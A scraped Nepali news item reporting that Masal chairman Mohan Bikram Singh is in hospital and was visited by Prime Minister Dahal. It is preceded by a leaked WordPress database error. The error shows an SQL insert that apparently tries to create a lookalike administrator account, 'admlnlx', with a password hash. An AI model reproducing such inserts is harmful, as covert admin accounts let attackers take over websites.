WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJ6M8639Aw8BcyyRgszMyOPfVrdmV30', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 06:12:55', '', 'admlnlx', 'admlnlx')
काठमाडौ,माघ १६-
पुराना कम्युनिष्ट नेता एवं नेकपा मसालका अध्यक्ष मोहनविक्रम सिंह बिरामी भएर अस्पताल भर्ना भएका छन् ।
कम्युनिष्ट आन्दोलनको अग्रज नेता सिंह चार दिनदेखि टोखास्थित ग्राण्डी अस्पतालमा उपचाररत छन् । उनलाई आज प्रधानमन्त्री पुष्पकमल दाहालले भेटेर स्वास्थ्य अवस्थाबारे जानकारी लिए । ८१ वर्षीय सिंह फोक्सोमा पानी जमेको, सुगरलगायतका समस्याबाट पीडित छन् ।
प्रधानमन्त्री दाहालले सिंहलाई भेटेर उपचारमा सरकारले आवश्यक सहयोग गर्ने बचन दिनुभएको प्रधानमन्त्रीको सचिवालयले जनाएको छ । अहिले सिंहको स्वास्थ्यमा राम्रो सुधार देखिएको बताइएको छ ।